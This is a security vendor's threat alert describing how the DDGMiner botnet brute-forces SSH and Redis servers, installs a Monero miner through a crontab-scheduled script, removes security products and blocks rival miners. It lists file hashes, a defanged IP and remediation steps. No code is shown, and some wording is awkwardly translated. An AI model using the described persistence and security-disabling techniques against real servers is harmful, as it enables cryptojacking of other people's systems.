Rewterz Threat Alert – 8 Year-Old Bug Resurrected for LimeRAT Campaign
April 2, 2020Rewterz Threat Alert – Formbook delivered by Covid-19 lure
April 3, 2020Rewterz Threat Alert – 8 Year-Old Bug Resurrected for LimeRAT Campaign
April 2, 2020Rewterz Threat Alert – Formbook delivered by Covid-19 lure
April 3, 2020Severity
High
Description
Password blast attacks on SSH server are being initiated by the large mining botnet DDGMiner to mine Monero, consuming excessive system resources and disabling some security products.
Analysis Summary
Recently, a weak password blast attack on the SSH server was detected by a security researcher. It was an attack initiated by the large mining botnet DDGMiner. It is characterized by scanning and attacking SSH service, Redis database, OrientDB database and other servers, and implanting a mining Trojan on the compromised server to mine Monero for profit. DDGMiner’s main propagation method is still SSH blasting. Hackers first download the shell script i.sh after being hacked through weak passwords or exploits, and install it as a crontab scheduled task to be executed every 15 minutes.The DDG botnet mainly scans the SSH service and the Redis service for violent invasion of the LINUX system to dig Monero for profit. The mining Trojan is continuously being updated by attackers, as 9 new versions were released in the past month alone. After the DDG mining trojan is executed, it will request a configuration file to be downloaded. According to the configuration file, the mining trojan wordpress and virus script i.sh will be executed. In addition, the latest version of the DDG mining trojan will download the uninstall.sh , quartz_uninstall script . sh uninstalls security protection products such as Tencent Yunyun Mirror and Ali Yunan Knight to enhance the survival time of mining Trojans on the server. Virus mining behavior will greatly affect server performance. Additionally, the trojan modifies the hosts file to map the URLs of competing Trojans such as trumpzwlvlyrvlss.onion to the IP address 0.0.0.0 to achieve the purpose of shielding competitors’ Trojan horses from monopolizing system resources. The Monero Mining Trojan wordpress is compiled by the open source mining program XMRig.
Impact
- Consumption of system resources
- Possible denial of service
- Disabling of some security products
Indicators of Compromise
MD5
- f84a0180ebf1596df4e8e8b8cfcedf63
- 14fcb1d3a0f6ecea9e18eff2016bc271
- d146612bed765ba32200e0f97d0330c8
- e64b247d4cd9f8c58aedc708c822e84b
- 682f839c1097af5fae75e0c5c39fa054
- 495dfc4ba85fac2a93e7b3f19d12ea7d
- dc87e9c91503cc8f2e8e3249cd0b52d7
SHA-256
- feb6e520d901c2bf56a87b1dda9144e7a534d11ed0269a43146e18d926844662
- a30d73e25d83117b372494b65c289e6be41f68999d53843970f1d5d7bcab9497
- 1309a879002171c6fc080ed7f2d63341576a9b1168d7d6f6125968bb5b8840b7
- 471713ed425d7b7b0ef8a188218e0fa79b06ba5f1174e2193d6d08d14d114118
- 49c1c3eb642ab70fcdda73a20cb82cc64cf617872e3130190d09a94edf954dff
- 306e23b30a282b5d58c82fd267ba3bc8c292c2ee48384f976c3513437182f9be
- c7b43e209df939969c9ad3c8d6d1dbeeb87e3abd85f5a87f4d1cb74127065067
Source IP
- 67[.]205[.]168[.]20
Remediation
- Block the threat indicators at their respective controls.
- Prioritize the patching of security vulnerabilities of the relevant components of the enterprise server.
- Use high-strength Redis login password and SSH login password.
- Add firewall rules if necessary to avoid IP access from other untrusted sources.